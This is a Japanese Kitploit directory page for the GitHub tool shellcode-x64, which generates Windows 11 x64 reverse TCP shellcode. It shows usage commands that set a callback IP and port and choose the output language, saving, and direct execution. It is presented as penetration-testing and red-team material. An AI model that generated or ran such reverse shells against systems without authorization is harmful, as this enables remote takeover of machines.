Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
shellcode-x64 — Windows >= 11 x64 用シェルコード | Kitploit
ツール/GitHubGitHub/hvictor/shellcode-x64
ペイロード生成エクスプロイトシェルコードペネトレーションテストレッドチーミングシェルコード生成ペイロード開発
GitHubhvictor/shellcode-x64

shellcode-x64

Windows >= 11 x64 用シェルコード

リポジトリを見る
736ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Microsoft Windows 11 x64用Shellcode

Python Assembly

このスクリプトは、PICテクニックを使用してWindows 11 x64 Reverse TCP Shellcodeを生成します。


Shellcode生成の使用方法

root@kitploit:~
python ./shell_reverse_tcp.py -i 192.168.10.10 -p 443

デフォルトの言語はCタイプのシェルコードで、Python、C#、PowerShellも選択できます:

root@kitploit:~
python ./shell_reverse_tcp.py -i 192.168.10.10 -p 443 --language powershell

ファイルを保存する場合:

root@kitploit:~
python ./shell_reverse_tcp.py -i 192.168.10.10 -p 443 --save true

デフォルトの出力はoutput.binです:

root@kitploit:~
python ./shell_reverse_tcp.py -i 192.168.10.10 -p 443 --save true --output shellcode.bin

テストおよび実行の場合:

root@kitploit:~
python ./shell_reverse_tcp.py -i 192.168.10.10 -p 443 -execution true

そして:

root@kitploit:~
python ./shell_reverse_tcp.py -i 192.168.10.10 -p 443 -execution true --language powershell --save true --output shellcode.bin

楽しく学習してください ;)

ツールをダウンロード